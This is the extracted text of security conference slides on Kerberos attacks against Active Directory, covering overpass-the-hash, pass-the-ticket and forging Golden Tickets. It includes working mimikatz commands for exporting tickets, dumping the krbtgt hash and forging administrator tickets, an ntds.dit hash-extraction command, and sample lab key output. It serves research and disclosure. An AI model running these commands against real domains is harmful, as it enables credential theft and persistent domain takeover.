aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd
5c827847ade468d6f6f739eb00c68e42
aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb
des_cbc_md5 (4096) : 620eb39e450e6776
• KRBTGT account pwd / hash only changes:
– Upgrade of domain functional level (NT5->NT6)
– Bare metal recovery using restore media
– Manually changed (compromise recovery)
– In most enterprises this password hasn’t changed
in YEARS
16. • All of that is not secret !
– Tickets are ASN.1 encoded
• Use OpenSSL or your favorite tool
– Kerberos ticket (and KRB-CRED format)
• http://www.ietf.org/rfc/rfc4120.txt
– Microsoft Specific PAC
• http://msdn.microsoft.com/library/cc237917.aspx
Kerberos :: internal
21. • Keys are both in Active Directory and client LSASS memory
• We can find:
– DES key
– RC4 key…. Yep, this is the NTLM hash of the password, no domain salt!
• Sorry Microsoft, we don’t get it, but your RFC yes ;) - http://www.ietf.org/rfc/rfc4757.txt
– AES128 & AES256 keys (with NT 6)
• New “protected users” group prevents Keys in client LSASS memory
– Of course not on the DC ;)
Kerberos :: Overpass-the-hash
22. • AES Keys use PBKDF2
– These hashes are salted
– 4096 iterations of the PBKDF2 algorithm
– Difficult to crack
• Of course these hashes are cached in memory on the client side and then
used as password equivalents, just like the NT hashes
• This is how you fail with strong cryptography
Kerberos :: AES Keys
23. • From Active Directory : Offline
– “just” need : ntds.dit & SYSTEM hive
– NTDSXtract : http://www.ntdsxtract.com
• python dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 ./work --name
Administrateur --syshive SYSTEM --supplcreds --passwordhashes --lmoutfile ./lm --ntoutfile
./nt --pwdformat john
Kerberos :: Overpass-the-hash
User name: Administrateur
[...]
Password hashes:
Administrateur:$NT$cc36cf7a8514893efccd332446158b1a:::
Supplemental credentials:
Kerberos newer keys
salt: CHOCOLATE.LOCALAdministrateur
Credentials
18 b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
17 8451bb37aa6d7ce3d2a5c2d24d317af3
3 f8fd987fa7153185
28. • By the way, this is exactly how Aorato POC works
for changing password with just NTLM hash!
– They send a Kerberos request to the service :
kadmin/changepw
• http://www.aorato.com/blog/active-directory-vulnerability-
disclosure-weak-encryption-enables-attacker-change-victims-
password-without-logged/
Kerberos :: Overpass-the-hash
(more…)
33. • TGT & TGS are in client LSASS memory
– The “normal” way: by API
• User can only export their ticket(s) (without privilege)
• For TGT: AllowTgtSessionKey registry key must be set for session key export…
– (mandatory to use the TGT)
• For TGS: no restriction at all!
– To get tickets : LsaCallAuthenticationPackage/KerbRetrieveEncodedTicketMessage
• In mimikatz: kerberos::list [/export]
– To pass-the-ticket : LsaCallAuthenticationPackage/KerbSubmitTicketMessage
• In mimikatz: kerberos::ptt ticket.kirbi
Not a hack : http://msdn.microsoft.com/library/windows/desktop/aa378099.aspx
Kerberos :: TGT & TGS
34. • Ok, but I want other people’s TGT & TGS !
Why do you want that? Are you a hacker?
– Raw memory reading (yep, even with minidump!)
– This time with all session keys
Kerberos :: TGT & TGS
35. • In mimikatz :
– privilege::debug
• (if not already SYSTEM)
– sekurlsa::tickets /export
• Make your choice !
• Then use it :
– kerberos::ptt ticket.kirbi
Kerberos :: TGT & TGS
37. * No encryption check for THE domain administrator (id==500) !
No worry, this account is not sensitive ;)
** Not in memory when user in « Protected Users » group
Kerberos :: make your choice
Default
lifetime
Minimum
number of
KDC accesses
Multiple
targets
Available
with
Smartcard
Realtime check for
restrictions
(account disabled, logon
hours...)
Protected Users
Check for Encryption *
(RC4/AES)
Can be found in Is funky
Normal 42 days 2 Yes Yes Yes Yes n.a. No
Overpass-the-hash
(Pass-the-key)
42 days 2 Yes No Yes Yes
Active Directory
Client Memory **
No
(ok, a little;))
Pass-the-Ticket
(TGT)
10 hours 1 Yes Yes No (20mn after) No Client Memory Yes
Pass-the-Ticket
(TGS)
10 hours 0 No Yes No No Client Memory Yes
Golden Ticket 10 years 1 Yes Yes No (we can cheat) No n.a. Fuck, Yes!
39. • A “Golden Ticket”, is a homemade ticket
– It’s done with a lot of love
– … and a key
• It’s not made by the KDC, so :
– it’s not limited by GPO or others settings ;)
– you can push whatever you want inside!
– it’s smartcard independent (sorry CISO !)
Kerberos :: Golden Ticket
40. • …but a golden ticket is not only about lifetime modification (10 years is
hardcoded but can be modified)
• Interesting part is about to modify data into, like lifetime, but mainly the
Microsoft PAC :
– Groups (Domain/Enterprise Admins, by example ;)
– SID
– Username
Kerberos :: Golden Ticket
41. • Kerberos is STATELESS
– All account policy info is in the TGT
• Disabled / Expired / outside of logon hours
• Password expired
• Authentication silo membership
• “Protected Users” is just a group membership in the PAC
• Group Membership in the PAC
– This means that ALL account policy is Client Side Enforcement
Kerberos :: AD Account Policy
42. • Kerberos 5 has no method for the KDC/TGS (server) to validate
that an account is still valid when presented with a TGT
– Microsoft implemented a solution for this problem
– IF the TGT is older than 20 minutes, the KDC will validate the account
is still valid / enabled before issuing service tickets
• We will come back to this later
Kerberos :: 20 Minute Rule
43. • Even if the technique remains the same, I’ve made the choice to
limit it to TGT (no TGS)
– Why ? Because TGT and TGS rely on different keys
– target key is renewed periodically, krbtgt… ~never
– A single TGT can obtain many TGS
Kerberos :: Golden Ticket
Ticket
Encryption
PAC KDC
Signature
PAC Server
Signature
TGT krbtgt krbtgt krbtgt
TGS target krbtgt target
44. • All you need is :
– KDC Key (krbtgt), it can be RC4 (NTLM hash) or AES
– SID of the domain (whoami, psgetsid, etc.)
– Domain name
Kerberos :: Golden Ticket
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670
* Primary
LM :
NTLM : 310b643c5316c8c3c70a10cfb17e2e31
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42
aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb
des_cbc_md5 (4096) : 620eb39e450e6776
45. • Create your own !
• kerberos::golden
/domain:chocolate.local <= domain name
/sid:S-1-5-21-130452501-2365100805-3685010670 <= domain SID
/rc4:310b643c5316c8c3c70a10cfb17e2e31 <= NTLM hash of krbtgt
/user:Administrateur <= username you wanna be
/id:500 <= RID of username (500 is THE domain admin)
/groups:513,512,520,518,519 <= Groups list of the user (be imaginative)
/ticket:Administrateur.kirbi <= the ticket filename
Kerberos :: Golden Ticket
46. • Client name : Administrateur
• Service name : krbtgt/chocolate.local
• Validity
– Start Time 07/08/2014 12:05:00
– End Time 07/08/2024 12:05:00
• …
• Authorization data Microsoft (PAC)
– Username : Administrateur
– Domain SID
• S-1-5-21-130452501-2365100805-3685010670
– User ID
• 500 Administrateur
– Groups ID
• 512 Admins du domaine
• 519 Administrateurs de l’entreprise
• 518 Administrateurs du schéma
• …
– …
Kerberos :: Golden Ticket
47. • Be crazy =)
– We want to have a long time access to a share limited to a user
“utilisateur”, disabled.
• kerberos::golden
/domain:chocolate.local
/sid:S-1-5-21-130452501-2365100805-3685010670
/aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42
/user:srvcharly$ <= real account always in good state
/id:1001 <= RID of the real account
/groups:513,1107 <= RID of “utilisateur” account, yep, in groups =)
/ticket:fake_utilisateur.kirbi
Kerberos :: Golden Ticket
48. • Be funky =)
• kerberos::golden
/domain:chocolate.local
/sid:S-1-5-21-130452501-2365100805-3685010670
/rc4:310b643c5316c8c3c70a10cfb17e2e31
/user:badguy
/id:0xffffffff
/groups:513,512,520,518,519
/ticket:badguy.kirbi
• Yep, both the USER and the ID don’t exist, so this TGT will only work for 20 mins (TGS
watchdog)
– It works if an ACL is defined with groups (this one spoofs a user in domain admins group; 512)
– …but all TGS obtained in this 20 mins will be valid 10h ;)
– …and you can make multiple TGT…
Kerberos :: Golden Ticket
52. • You! To come listen us!
– And trying to understand Benjamin ;)
– If you are shy : exorcyst{put here @}gmail.com & benjamin{put here @}gentilkiwi.com
• My co-speaker - he will recognize himself ;)
• Blackhat staff !
• Microsoft
– They give us a lot’s of subject for slides!
– For a few years, they have worked hard to enhance a lots of things in security (and it’s not easy to mix
security with retro compatibility)
• Security community (sorry, we have both a big list)
– Come see us for beer-time & stickers :P
Thank you all !